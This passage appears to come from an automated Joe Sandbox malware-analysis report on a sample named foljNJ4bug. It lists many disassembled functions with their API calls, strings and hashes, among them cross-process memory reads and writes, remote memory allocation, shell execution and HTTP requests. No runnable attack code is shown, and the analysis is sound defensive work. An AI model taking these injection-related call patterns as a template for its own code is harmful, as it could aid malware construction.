                                                                                                                                              • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                              • String ID: .lnk
                                                                                                                                              • API String ID: 886957087-24824748
                                                                                                                                              • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                                                                                              • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                                                                                                                              • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                                                                                              • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _memmove
                                                                                                                                              • String ID: \
                                                                                                                                              • API String ID: 4104443479-2967466578
                                                                                                                                              • Opcode ID: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                                                                                              • Instruction ID: 90b25fc4546a2c21e21e7939c456fa175a28996bec6c3309f7edcf8d77039fcb
                                                                                                                                              • Opcode Fuzzy Hash: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                                                                                              • Instruction Fuzzy Hash: 8AB1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _memmove
                                                                                                                                              • String ID: \
                                                                                                                                              • API String ID: 4104443479-2967466578
                                                                                                                                              • Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                                                                                              • Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
                                                                                                                                              • Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                                                                                              • Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _memmove
                                                                                                                                              • String ID: \
                                                                                                                                              • API String ID: 4104443479-2967466578
                                                                                                                                              • Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                                                                                              • Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
                                                                                                                                              • Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                                                                                              • Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
                                                                                                                                              Strings
                                                                                                                                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                                                                                                                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                                              • API String ID: 708495834-557222456
                                                                                                                                              • Opcode ID: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                                                                                                              • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                                                                                                                              • Opcode Fuzzy Hash: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                                                                                                              • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                                                                                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                                                                                                                • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                                                                                                                • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                                                                                                                • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                                                                                                                • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                                                                                                              • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                              • String ID: @
                                                                                                                                              • API String ID: 4150878124-2766056989
                                                                                                                                              • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                                                                                              • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                                                                                                                              • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                                                                                              • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _memmove
                                                                                                                                              • String ID: \$]$h
                                                                                                                                              • API String ID: 4104443479-3262404753
                                                                                                                                              • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                                                                                              • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                                                                                                                              • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                                                                                              • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                                                                                                                              APIs
                                                                                                                                              • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                                                                                                                • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                                                • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00457E09
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                                                                                                                              • String ID: <$@
                                                                                                                                              • API String ID: 2417854910-1426351568
                                                                                                                                              • Opcode ID: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                                                                                                                              • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                                                                                                                              • Opcode Fuzzy Hash: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                                                                                                                              • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                                                                                                                              APIs
                                                                                                                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                                                                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                                                                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                                                                                                                                • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3705125965-3916222277
                                                                                                                                              • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                                                                                              • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                                                                                                                              • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                                                                                              • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                                                                                                                              APIs
                                                                                                                                              • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                                                                                                                              • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                                                                                                                              • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Menu$Delete$InfoItem
                                                                                                                                              • String ID: 0
                                                                                                                                              • API String ID: 135850232-4108050209
                                                                                                                                              • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                                                                                              • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                                                                                                                              • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                                                                                              • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                                                                                                                              APIs
                                                                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$Long
                                                                                                                                              • String ID: SysTreeView32
                                                                                                                                              • API String ID: 847901565-1698111956
                                                                                                                                              • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                                                                                              • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                                                                                                                              • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                                                                                              • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                                                                                                                              APIs
                                                                                                                                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                                                                                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                                                                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$Window
                                                                                                                                              • String ID: SysMonthCal32
                                                                                                                                              • API String ID: 2326795674-1439706946
                                                                                                                                              • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                                                                                              • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                                                                                                                                              • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                                                                                              • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                                                                                                                                              APIs
                                                                                                                                              • DestroyWindow.USER32(00000000), ref: 00450A2F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DestroyWindow
                                                                                                                                              • String ID: msctls_updown32
                                                                                                                                              • API String ID: 3375834691-2298589950
                                                                                                                                              • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                                                                                              • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                                                                                                                              • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                                                                                              • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _memmove
                                                                                                                                              • String ID: $<
                                                                                                                                              • API String ID: 4104443479-428540627
                                                                                                                                              • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                                                                                              • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                                                                                                                                              • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                                                                                              • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                                                                                                                                              APIs
                                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                                                                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                                                                                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                              • String ID: \VH
                                                                                                                                              • API String ID: 1682464887-234962358
                                                                                                                                              • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
